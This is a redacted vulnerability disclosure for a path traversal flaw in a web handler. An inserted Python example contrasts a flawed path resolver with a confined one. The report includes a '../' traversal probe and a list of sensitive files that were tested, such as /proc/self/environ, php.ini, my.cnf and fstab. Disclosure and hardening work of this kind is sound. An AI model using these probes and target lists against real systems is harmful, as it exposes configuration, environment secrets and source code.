Summary:
The web application hosted on the “███████” domain is affected by a path traversal vulnerability that could permit an attacker to include arbitrary files located outside of the restricted directory.
Description:
The affected handler is the “█████”.
This handler receives, through the “█████” parameter, user-supplied input that is used to construct a pathname intended to identify a file. The web application does not properly neutralize “dot-dot-slash (../)” sequences within that pathname, so the pathname can resolve to a location outside of the restricted directory, as shown in the following example, in which the “█████████████/hosts” configuration file is included:
Example of payload:
https://█████████████████████████
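Added example, not code from the report or the affected site: since the real handler and parameter are redacted, the base directory and function names below are assumptions. It places the flawed "concatenate and normalise" behaviour beside a resolver that confines the result to the restricted directory, and shows the traversal input from this report being rejected by the hardened version.

```python
import posixpath
from typing import Optional

# Constructed example: the restricted directory the handler is meant to serve
# files from (assumed name; the report's real path is redacted).
BASE_DIR = "/var/www/app/pages"


def unsafe_resolve(user_input: str) -> str:
    """Mirror the flawed behaviour described in the report: the parameter is
    appended to the base directory and normalised, so every "../" walks one
    directory up and the result may land anywhere on the file system."""
    return posixpath.normpath(posixpath.join(BASE_DIR, user_input))


def safe_resolve(user_input: str) -> Optional[str]:
    """Resolve the request inside BASE_DIR and refuse anything that escapes.

    Returns the confined absolute path, or None when the input would resolve
    outside the restricted directory (traversal, absolute path, NUL byte).
    """
    if "\x00" in user_input:
        # Embedded NUL bytes truncate paths in C-based runtimes; reject outright.
        return None
    base = posixpath.normpath(BASE_DIR)
    # posixpath.join discards the base when user_input is absolute ("/etc/..."),
    # which the commonpath check below also catches.
    candidate = posixpath.normpath(posixpath.join(base, user_input))
    # commonpath avoids the prefix trap: "/var/www/app/pages2" must not pass
    # merely because it starts with the string "/var/www/app/pages".
    if posixpath.commonpath([base, candidate]) != base:
        return None
    # In production, additionally run os.path.realpath on the candidate before
    # opening it, so symlinks inside BASE_DIR cannot point back outside.
    return candidate


def is_traversal_attempt(user_input: str) -> bool:
    """Detection helper: True when the input would escape BASE_DIR."""
    return safe_resolve(user_input) is None


if __name__ == "__main__":
    # The long "../" chain seen in the report collapses to the root directory
    # under the unsafe resolver but is refused by the safe one.
    probe = "../" * 15 + "etc/hosts"
    print("unsafe ->", unsafe_resolve(probe))       # /etc/hosts
    print("safe   ->", safe_resolve(probe))         # None
    print("legit  ->", safe_resolve("index.html"))  # /var/www/app/pages/index.html
```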
Several tests were performed against different files; some of them are:
/proc/self████nviron
/proc/self/status
/proc/meminfo
/proc/cpuinfo
/proc/partitions
████████████/hosts
████████████████/php.ini
█████████████████/rpc
███████████/my.cnf
█████████████/fstab
█████████████/group
███████████████/nsswi██████h.conf
███████████████/updatedb.conf
██████████/logrotate.d/httpd
/usr/bin/curl
It may be possible to access arbitrary files and directories stored on the file system, including application source code, configuration files and critical system files.
██████████